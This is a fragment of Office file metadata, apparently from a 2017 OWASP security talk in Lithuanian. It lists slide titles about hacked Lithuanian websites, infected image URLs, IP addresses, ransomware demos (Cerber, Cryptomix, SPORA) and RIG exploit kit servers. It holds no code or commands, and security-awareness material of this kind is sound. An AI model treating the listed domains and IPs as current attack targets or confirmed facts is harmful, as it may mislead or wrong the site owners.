      <vt:lpstr>Demo hacks</vt:lpstr>
      <vt:lpstr>www.jotvingiai.alytus.lm.lt (2017.04.15)</vt:lpstr>
      <vt:lpstr>www.iliuzija.lt (2017.04.14)</vt:lpstr>
      <vt:lpstr>www.kvc.vgtu.lt (2017.04.15)</vt:lpstr>
      <vt:lpstr>www.alauspurslai.lt (2017.04.14)</vt:lpstr>
      <vt:lpstr>integer.su.lt (2017.04.20)</vt:lpstr>
      <vt:lpstr>Svetainių klaidos</vt:lpstr>
      <vt:lpstr>rinkimai.elta.lt (2017.04.14) </vt:lpstr>
      <vt:lpstr>www.evv.lt (2017.04.14)</vt:lpstr>
      <vt:lpstr>www.evv.lt (2017.04.14)</vt:lpstr>
      <vt:lpstr>rusradio.lt (2017.04.20)</vt:lpstr>
      <vt:lpstr>Valdomos svetainės</vt:lpstr>
      <vt:lpstr> http://www.mexpro.lt/client/images/span_bg.jpg (2017.04.17) </vt:lpstr>
      <vt:lpstr>http://www.mexpro.lt</vt:lpstr>
      <vt:lpstr>http://www.musumenas.lt/client/images/left_bottom.jpg(2017.04.17 </vt:lpstr>
      <vt:lpstr>http://www.mineralai.lt/client/images/menul0_start.jpg (2017.04.17) </vt:lpstr>
      <vt:lpstr>nslookup</vt:lpstr>
      <vt:lpstr>www.bing.com – ip: direktyva</vt:lpstr>
      <vt:lpstr>„Baltnetos komunikacijos“, IP: 213.197.148.36</vt:lpstr>
      <vt:lpstr>„Interneto vizija“, IP: 79.98.26.139 (kontrolėsmigracija)</vt:lpstr>
      <vt:lpstr>http://senojianimacija.lt/wp-content/themes/detube/images/social.png ((2017.04.17)) </vt:lpstr>
      <vt:lpstr>Atakuojančios svetainės</vt:lpstr>
      <vt:lpstr>Cerber</vt:lpstr>
      <vt:lpstr>Cerber demo</vt:lpstr>
      <vt:lpstr>Cryptomix</vt:lpstr>
      <vt:lpstr>Cryptomix demo</vt:lpstr>
      <vt:lpstr>SPORA</vt:lpstr>
      <vt:lpstr>SPORA demo</vt:lpstr>
      <vt:lpstr>Informacijos šaltiniai</vt:lpstr>
      <vt:lpstr>Informacijos publikavimas</vt:lpstr>
      <vt:lpstr>Informacijos publikavimas</vt:lpstr>
      <vt:lpstr>Informacijos pritaikymas</vt:lpstr>
      <vt:lpstr>Informacijos pritaikymas</vt:lpstr>
      <vt:lpstr>Įmonės tinklo saugumo patikrinimas</vt:lpstr>
      <vt:lpstr>Saugumo produktų patikrinimas</vt:lpstr>
      <vt:lpstr>Įmonės tinklų apsauga</vt:lpstr>
      <vt:lpstr>RIG-o serveriai</vt:lpstr>
      <vt:lpstr>RIG-o stabdymas</vt:lpstr>
      <vt:lpstr>Svetainė su įdiegtu WAF-u</vt:lpstr>
      <vt:lpstr>LT hackers</vt:lpstr>
      <vt:lpstr>KET</vt:lpstr>
      <vt:lpstr>Klausimai ?</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP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</dc:title>
  <dc:creator>Darius Povilaitis</dc:creator>
  <cp:lastModifiedBy>D</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-03-30T06:23:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-26T13:57:51Z</dcterms:modified>
</cp:coreProperties>
</file>